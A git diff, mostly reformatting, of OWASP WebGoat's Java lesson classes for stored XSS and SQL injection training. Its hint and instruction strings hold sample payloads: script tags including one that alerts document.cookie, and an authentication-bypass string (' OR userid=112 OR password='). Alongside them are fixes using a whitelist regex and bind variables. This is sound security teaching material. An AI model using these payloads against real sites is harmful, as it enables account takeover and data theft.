+	 * Gets the category attribute of the CrossSiteScripting object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
+	{
+		return Category.XSS;
+	}
+
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+
+		// Stage 1
+		hints.add("You can put HTML tags in form input fields.");
+		hints.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
+		hints
+				.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
+		hints.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
+
+		// Stage 2
+		hints.add("Many scripts rely on the use of special characters such as: &lt;");
+		hints
+				.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
+		hints.add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern).");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "";
+
+		if (!getLessonTracker(s).getCompleted())
 		{
-		    instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
-			    + "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. ";
-		    if (getWebgoatContext().getDatabaseDriver().contains("jtds"))
-		    	instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. ";
-			instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ "
-			    + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
+			String stage = getStage(s);
+			if (STAGE1.equals(stage))
+			{
+				instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
+						+ "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
+						+ "Verify that 'Jerry' is affected by the attack. "
+						+ "A sample JavaScript snippet you can use is: &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.";
+			}
+			else if (STAGE2.equals(stage))
+			{
+				instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
+						+ "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. ";
+				if (getWebgoatContext().getDatabaseDriver().contains("jtds"))
+					instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. ";
+				instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ "
+						+ "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
+			}
 		}
+
+		return instructions;
+
 	}
 
-	return instructions;
-
-    }
-
-    @Override
-	public String[] getStages() {
-    	if (getWebgoatContext().isCodingExercises())
-    		return new String[] {STAGE1, STAGE2};
-    	return new String[] {STAGE1};
-	}
-
-    public void handleRequest(WebSession s)
-    {
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
-	{
-	    requestedActionName = s.getParser().getStringParameter("action");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
-	}
-
-	if (requestedActionName != null)
-	{
-	    try
-	    {
-		LessonAction action = getAction(requestedActionName);
-
-		if (action != null)
-		{
-		    if (!action.requiresAuthentication()
-			    || action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-			//setCurrentAction(s, action.getNextPage(s));
-		    }
-		}
-		else
-		{
-		    setCurrentAction(s, ERROR_ACTION);
-		}
-	    }
-	    catch (ParameterNotFoundException pnfe)
-	    {
-		System.out.println("Missing parameter");
-		pnfe.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ValidationException ve)
-	    {
-		System.out.println("Validation failed");
-		ve.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (UnauthenticatedException ue)
-	    {
-		s.setMessage("Login failed");
-		System.out.println("Authentication failure");
-		ue.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		s.setMessage("You are not authorized to perform this function");
-		System.out.println("Authorization failure");
-		ue2.printStackTrace();
-	    }
-	    catch (Exception e)
-	    {
-		// All other errors send the user to the generic error page
-		System.out.println("handleRequest() error");
-		e.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	}
-
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the CrossSiteScripting object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "LAB: DB Cross Site Scripting (XSS)";
-    }
-
 	@Override
-	protected boolean getDefaultHidden() {
+	public String[] getStages()
+	{
+		if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 };
+		return new String[] { STAGE1 };
+	}
+
+	public void handleRequest(WebSession s)
+	{
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
+
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
+		}
+
+		if (requestedActionName != null)
+		{
+			try
+			{
+				LessonAction action = getAction(requestedActionName);
+
+				if (action != null)
+				{
+					if (!action.requiresAuthentication() || action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+						// setCurrentAction(s, action.getNextPage(s));
+					}
+				}
+				else
+				{
+					setCurrentAction(s, ERROR_ACTION);
+				}
+			} catch (ParameterNotFoundException pnfe)
+			{
+				System.out.println("Missing parameter");
+				pnfe.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (ValidationException ve)
+			{
+				System.out.println("Validation failed");
+				ve.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (UnauthenticatedException ue)
+			{
+				s.setMessage("Login failed");
+				System.out.println("Authentication failure");
+				ue.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				s.setMessage("You are not authorized to perform this function");
+				System.out.println("Authorization failure");
+				ue2.printStackTrace();
+			} catch (Exception e)
+			{
+				// All other errors send the user to the generic error page
+				System.out.println("handleRequest() error");
+				e.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			}
+		}
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the CrossSiteScripting object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "LAB: DB Cross Site Scripting (XSS)";
+	}
+
+	@Override
+	protected boolean getDefaultHidden()
+	{
 		String driver = getWebgoatContext().getDatabaseDriver();
-		boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds"));
+		boolean hidden = !(driver.contains("oracle") || driver.contains("jtds"));
 		return hidden;
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java
index a09008621..087eaa05a 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.DBCrossSiteScripting;
 
 import java.sql.CallableStatement;
@@ -5,9 +6,7 @@ import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import javax.servlet.http.HttpServletRequest;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -19,250 +18,223 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class UpdateProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-			    + RoleBasedAccessControl.USER_ID);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-		HttpServletRequest request = s.getRequest();
-		int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID));
-		String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME);
-		String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME);
-		String ssn = request.getParameter(DBCrossSiteScripting.SSN);
-		String title = request.getParameter(DBCrossSiteScripting.TITLE);
-		String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER);
-		String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1);
-		String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2);
-		int manager = Integer.parseInt(request
-			.getParameter(DBCrossSiteScripting.MANAGER));
-		String startDate = request.getParameter(DBCrossSiteScripting.START_DATE);
-		int salary = Integer.parseInt(request
-			.getParameter(DBCrossSiteScripting.SALARY));
-		String ccn = request.getParameter(DBCrossSiteScripting.CCN);
-		int ccnLimit = Integer.parseInt(request
-			.getParameter(DBCrossSiteScripting.CCN_LIMIT));
-		String disciplinaryActionDate = request
-			.getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE);
-		String disciplinaryActionNotes = request
-			.getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES);
-		String personalDescription = request
-			.getParameter(DBCrossSiteScripting.DESCRIPTION);
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
+	{
+		if (isAuthenticated(s))
+		{
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
 
-		Employee employee = new Employee(subjectId, firstName, lastName, ssn,
-			title, phone, address1, address2, manager, startDate, salary,
-			ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-			personalDescription);
+			HttpServletRequest request = s.getRequest();
+			int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID));
+			String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME);
+			String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME);
+			String ssn = request.getParameter(DBCrossSiteScripting.SSN);
+			String title = request.getParameter(DBCrossSiteScripting.TITLE);
+			String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER);
+			String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1);
+			String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2);
+			int manager = Integer.parseInt(request.getParameter(DBCrossSiteScripting.MANAGER));
+			String startDate = request.getParameter(DBCrossSiteScripting.START_DATE);
+			int salary = Integer.parseInt(request.getParameter(DBCrossSiteScripting.SALARY));
+			String ccn = request.getParameter(DBCrossSiteScripting.CCN);
+			int ccnLimit = Integer.parseInt(request.getParameter(DBCrossSiteScripting.CCN_LIMIT));
+			String disciplinaryActionDate = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE);
+			String disciplinaryActionNotes = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES);
+			String personalDescription = request.getParameter(DBCrossSiteScripting.DESCRIPTION);
 
-    	try 
-    	{
-	    if (subjectId > 0)
-	    {
-	    		this.changeEmployeeProfile(s, userId, subjectId, employee);
-		setRequestAttribute(s, getLessonName() + "."
-			+ DBCrossSiteScripting.EMPLOYEE_ID, Integer
-			.toString(subjectId));
-			if (DBCrossSiteScripting.STAGE1.equals(getStage(s)))
+			Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
+					manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+					personalDescription);
+
+			try
 			{
-				address1 = address1.toLowerCase();
-				boolean pass = address1.contains("<script>");
-				pass &= address1.contains("alert");
-				pass &= address1.contains("</script>");
-				if (pass)
+				if (subjectId > 0)
 				{
-					setStageComplete(s, DBCrossSiteScripting.STAGE1);
+					this.changeEmployeeProfile(s, userId, subjectId, employee);
+					setRequestAttribute(s, getLessonName() + "." + DBCrossSiteScripting.EMPLOYEE_ID, Integer
+							.toString(subjectId));
+					if (DBCrossSiteScripting.STAGE1.equals(getStage(s)))
+					{
+						address1 = address1.toLowerCase();
+						boolean pass = address1.contains("<script>");
+						pass &= address1.contains("alert");
+						pass &= address1.contains("</script>");
+						if (pass)
+						{
+							setStageComplete(s, DBCrossSiteScripting.STAGE1);
+						}
+					}
 				}
+				else
+					this.createEmployeeProfile(s, userId, employee);
+			} catch (SQLException e)
+			{
+				s.setMessage("Error updating employee profile");
+				e.printStackTrace();
+				if (DBCrossSiteScripting.STAGE2.equals(getStage(s))
+						&& (e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters"))
+						&& !employee.getAddress1().matches("^[a-zA-Z0-9,\\. ]{0,80}$"))
+				{
+					setStageComplete(s, DBCrossSiteScripting.STAGE2);
+				}
+
+			} catch (ClassNotFoundException e)
+			{
+				s.setMessage("Error updating employee profile");
+				e.printStackTrace();
 			}
-	    }
-	    else
-		this.createEmployeeProfile(s, userId, employee);
-    	}
-    	catch (SQLException e)
-    	{
-			s.setMessage("Error updating employee profile");
-			e.printStackTrace();
-    		if (DBCrossSiteScripting.STAGE2.equals(getStage(s)) && 
-    				(e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters")) &&
-    				!employee.getAddress1().matches("^[a-zA-Z0-9,\\. ]{0,80}$"))
-    		{
-    		    setStageComplete(s, DBCrossSiteScripting.STAGE2);
-    		}
 
-    	}
-    	catch (ClassNotFoundException e)
-    	{
-			s.setMessage("Error updating employee profile");
-			e.printStackTrace();
-    	}
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
+		}
+		else
+			throw new UnauthenticatedException();
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-    public String getNextPage(WebSession s)
-    {
-	return DBCrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
-	    Employee employee) throws SQLException, ClassNotFoundException
-    {
-    	try
-    	{
-		String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) }";
-		CallableStatement call = WebSession.getConnection(s).prepareCall(update);
-	    // Note: The password field is ONLY set by ChangePassword
-		call.setInt(1, userId);
-		call.setString(2, employee.getFirstName());
-		call.setString(3, employee.getLastName());
-		call.setString(4, employee.getSsn());
-		call.setString(5, employee.getTitle());
-		call.setString(6, employee.getPhoneNumber());
-		call.setString(7, employee.getAddress1());
-		call.setString(8, employee.getAddress2());
-		call.setInt(9, employee.getManager());
-		call.setString(10, employee.getStartDate());
-		call.setInt(11, employee.getSalary());
-		call.setString(12, employee.getCcn());
-		call.setInt(13, employee.getCcnLimit());
-		call.setString(14, employee.getDisciplinaryActionDate());
-		call.setString(15, employee.getDisciplinaryActionNotes());
-		call.setString(16, employee.getPersonalDescription());
-		call.executeUpdate();
-    	}
-    	catch (ClassNotFoundException e) 
-    	{
-    		e.printStackTrace();
-    	}
-    }
-
-    public void createEmployeeProfile(WebSession s, int userId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	public String getNextPage(WebSession s)
 	{
+		return DBCrossSiteScripting.VIEWPROFILE_ACTION;
+	}
+
+	public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) throws SQLException,
+			ClassNotFoundException
+	{
+		try
+		{
+			String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) }";
+			CallableStatement call = WebSession.getConnection(s).prepareCall(update);
+			// Note: The password field is ONLY set by ChangePassword
+			call.setInt(1, userId);
+			call.setString(2, employee.getFirstName());
+			call.setString(3, employee.getLastName());
+			call.setString(4, employee.getSsn());
+			call.setString(5, employee.getTitle());
+			call.setString(6, employee.getPhoneNumber());
+			call.setString(7, employee.getAddress1());
+			call.setString(8, employee.getAddress2());
+			call.setInt(9, employee.getManager());
+			call.setString(10, employee.getStartDate());
+			call.setInt(11, employee.getSalary());
+			call.setString(12, employee.getCcn());
+			call.setInt(13, employee.getCcnLimit());
+			call.setString(14, employee.getDisciplinaryActionDate());
+			call.setString(15, employee.getDisciplinaryActionNotes());
+			call.setString(16, employee.getPersonalDescription());
+			call.executeUpdate();
+		} catch (ClassNotFoundException e)
+		{
+			e.printStackTrace();
+		}
+	}
+
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
+	{
+		try
+		{
 			int nextId = getNextUID(s);
-		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+			String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
 
-	    try
-	    {
-    			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
 
-    			ps.setString(1, employee.getFirstName().toLowerCase());
-    			ps.setString(2, employee.getLastName());
-    			ps.setString(3, employee.getSsn());
-    			ps.setString(4, employee.getTitle());
-    			ps.setString(5, employee.getPhoneNumber());
-    			ps.setString(6, employee.getAddress1());
-    			ps.setString(7, employee.getAddress2());
-    			ps.setInt(8, employee.getManager());
-    			ps.setString(9, employee.getStartDate());
-    			ps.setString(10, employee.getCcn());
-    			ps.setInt(11, employee.getCcnLimit());
-    			ps.setString(12, employee.getDisciplinaryActionDate());
-    			ps.setString(13, employee.getDisciplinaryActionNotes());
-    			ps.setString(14, employee.getPersonalDescription());
+				ps.setString(1, employee.getFirstName().toLowerCase());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getDisciplinaryActionDate());
+				ps.setString(13, employee.getDisciplinaryActionNotes());
+				ps.setString(14, employee.getPersonalDescription());
 
-    			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
-	}
-    }
 
-    private int getNextUID(WebSession s)
-    {
-	int uid = -1;
-	try
+	private int getNextUID(WebSession s)
 	{
-	    Statement statement = WebSession.getConnection(s).createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement
-		    .executeQuery("select max(userid) as uid from employee");
-	    results.first();
-	    uid = results.getInt("uid");
+		int uid = -1;
+		try
+		{
+			Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																				ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
+			results.first();
+			uid = results.getInt("uid");
+		} catch (SQLException sqle)
+		{
+			sqle.printStackTrace();
+			s.setMessage("Error updating employee profile");
+		} catch (ClassNotFoundException e)
+		{
+			// TODO Auto-generated catch block
+			e.printStackTrace();
+		}
+		return uid + 1;
 	}
-	catch (SQLException sqle)
-	{
-	    sqle.printStackTrace();
-	    s.setMessage("Error updating employee profile");
-	}
-	catch (ClassNotFoundException e)
-	{
-	    // TODO Auto-generated catch block
-	    e.printStackTrace();
-	}
-	return uid + 1;
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
index 5d86f373d..287be6ce2 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.DBSQLInjection;
 
 import java.util.ArrayList;
@@ -20,241 +21,224 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class DBSQLInjection extends GoatHillsFinancial
 {
-    private final static Integer DEFAULT_RANKING = new Integer(75);
+	private final static Integer DEFAULT_RANKING = new Integer(75);
 
-    public final static int PRIZE_EMPLOYEE_ID = 112;
+	public final static int PRIZE_EMPLOYEE_ID = 112;
 
-    public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
+	public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
 
-    public final static String STAGE1 = "String SQL Injection";
-    
-    public final static String STAGE2 = "Block SQL Injection using Bind Variables";
-    
-    public void registerActions(String className)
-    {
-	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+	public final static String STAGE1 = "String SQL Injection";
 
-	// These actions are special in that they chain to other actions.
-	registerAction(new Login(this, className, LOGIN_ACTION,
-		getAction(LISTSTAFF_ACTION)));
-	registerAction(new Logout(this, className, LOGOUT_ACTION,
-		getAction(LOGIN_ACTION)));
-	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-		getAction(VIEWPROFILE_ACTION)));
-	registerAction(new UpdateProfile(this, className,
-		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-	registerAction(new DeleteProfile(this, className,
-		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
+	public final static String STAGE2 = "Block SQL Injection using Bind Variables";
 
-    /**
-     *  Gets the category attribute of the CrossSiteScripting object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
-
-    /**
-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
-	hints
-		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-			+ "stmt  := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';<br>"
-			+ "EXECUTE IMMEDIATE stmt INTO v_userid;");
-	hints
-		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
-			+ "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause");
-
-	// Stage 1
-	hints
-		.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
-	hints.add("Try entering a password of [ ' OR userid=112 OR password=' ].");
-
-	// Stage 2
-	hints
-		.add("Change the Stored procedure to use bind variables.");
-
-	return hints;
-    }
-
-    @Override
-	public String[] getStages() {
-    	if (getWebgoatContext().isCodingExercises())
-    		return new String[] {STAGE1, STAGE2};
-    	return new String[] {STAGE1};
-	}
-
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "";
-
-	if (!getLessonTracker(s).getCompleted())
+	public void registerActions(String className)
 	{
-		String stage = getStage(s);
-		if (STAGE1.equals(stage))
-	    {
-		    instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
-			    + "The goal here is to login as the user "
-			    + PRIZE_EMPLOYEE_NAME
-			    + ", who is in the Admin group.  "
-			    + "You do not have the password, but the form is SQL injectable. "
-			    + "View the EMPLOYEE_LOGIN stored procedure and see if you can "
-			    + "determine why the exploit exists.";
-	    }
-		else if (STAGE2.equals(stage))
-		{
-		    instructions = "Stage 2: Use bind variables.<br>"
-			    + "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database "
-			    + "to use bind variables, rather than string concatenation. "
-			    + "Repeat the SQL Injection attack. Verify that the attack is no longer effective.";
-		}
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
